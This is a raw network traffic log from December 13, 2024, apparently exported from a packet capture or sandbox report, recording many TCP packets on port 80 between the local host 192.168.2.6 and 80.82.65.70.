                                              Dec 13, 2024 10:49:16.269707918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.269753933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.270519018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.270570993 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.270611048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.270710945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.271459103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.271509886 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.271598101 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.271697998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.272432089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.272488117 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.272557020 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.272804022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.273307085 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.273359060 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.273410082 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.273514986 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.274233103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.274281979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.274354935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.274396896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.275217056 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.275269985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.275305033 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.275346994 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.276216030 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.276269913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.276364088 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.276405096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.277065992 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.277108908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.277179956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.277240992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.277930021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.277976036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.278063059 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.278106928 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.278860092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.278907061 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.278928995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.278968096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.279797077 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.279844046 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.279876947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.279917002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.280729055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.280780077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.280854940 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.280997038 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.281632900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.281685114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.281755924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.281796932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.282567024 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.282609940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.282635927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.282679081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.283477068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.283577919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.283622980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.366535902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.366585016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.366595030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.366631031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.366923094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.366975069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.367014885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.367134094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.367841005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.367918015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.367949009 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.367990971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.368757010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.368794918 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.368868113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.368910074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.369689941 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.369735003 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.369770050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.369807005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.370626926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.370671034 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.370747089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.370799065 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.371536016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.371615887 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.371638060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.371675014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.372469902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.372514009 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.372582912 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.372621059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.373402119 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.373444080 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.373482943 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.373544931 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.374317884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.374392986 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.374433041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.374473095 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.375247955 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.375292063 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.375366926 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.375408888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.376166105 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.376214981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.376276970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.376317024 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.377094984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.377135038 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.377325058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.377367973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378021002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.378067017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378104925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.378156900 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378932953 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.378985882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.378990889 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.379029989 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.379899979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.379945040 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.379987955 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.380026102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.380784988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.380836964 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.380877018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.380918980 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.381701946 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.381747007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.381803036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.381840944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.382611990 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.382657051 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.382698059 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.382778883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.383554935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.383599043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.383656979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.383699894 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.384464025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.384505987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.384572029 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.384614944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.385381937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.385413885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.385426044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.385443926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.386311054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.386415005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.386429071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.386449099 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.387219906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.387268066 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.448941946 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.448967934 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.449033976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.449067116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.449321985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.449364901 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.449409962 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.449450016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.450211048 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.450261116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.450345993 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.450381041 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.451134920 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.451178074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.451463938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.451509953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.451678038 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.451733112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.452378035 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.452472925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.452517033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.453301907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.453351021 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.453443050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.453547001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455329895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455389023 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455390930 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455404997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455432892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455456018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.455581903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.455621958 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.456104994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.456149101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.456218958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.456258059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.457011938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.457065105 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.457103014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.457144022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.457904100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.457954884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.458014965 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.458117008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.458861113 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.458911896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.459003925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.459203959 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.459767103 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.459826946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.459865093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.459911108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.460716009 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.460767031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.460798025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.461092949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.461620092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.461669922 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.461721897 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.461828947 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.462544918 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.462587118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.462666988 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.462708950 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.463515997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.463568926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.463574886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.463613987 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.464423895 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.464472055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.464530945 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.464639902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.465316057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.465415955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.465420961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.465461016 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.466285944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.466325998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.466346025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.466384888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.467148066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.467187881 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.467242956 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.467287064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.468116045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.468158960 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.468225002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.468322039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.469048977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.469104052 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.469134092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.469171047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.469944000 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.470092058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.470139027 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.470855951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.470896006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.470967054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.471029043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.471821070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.471869946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.471903086 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.471951008 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.472698927 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.472753048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.472814083 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.472881079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.473642111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.473700047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.473771095 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.473819971 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.474591017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.474704981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.474734068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.474781990 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.475558996 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.475589037 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.475649118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.558425903 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558516979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558582067 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.558648109 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558696032 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.558790922 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.558830023 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.559603930 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.559669018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.559705019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.559747934 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.560511112 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.560561895 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.560621023 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.560661077 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.561438084 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.561490059 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.561520100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.561568022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.562371969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.562424898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.562489986 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.562525988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.563297987 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.563348055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.563484907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.563538074 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.564198017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.564239979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.564311028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.564441919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.565102100 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.565145969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.565217018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.565264940 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.566051006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.566099882 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.566201925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.566359043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.566966057 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.567012072 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.567080021 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.567126036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.567919016 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.567995071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.568017006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.568248034 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.568851948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.568948030 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.568994045 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.569051027 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.569750071 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.569803953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.569847107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.569888115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.570655107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.570715904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.570768118 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.570820093 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.571634054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.571695089 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.571696997 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.571751118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.572576046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.572633028 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.572675943 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.572715044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.573441982 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.573486090 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.573529005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.573693991 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.574389935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.574430943 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.574498892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.574776888 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.575337887 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.575387001 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.575412035 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.575505972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.576237917 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.576289892 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.576339006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.576380968 CET4985880192.168.2.680.82.65.70
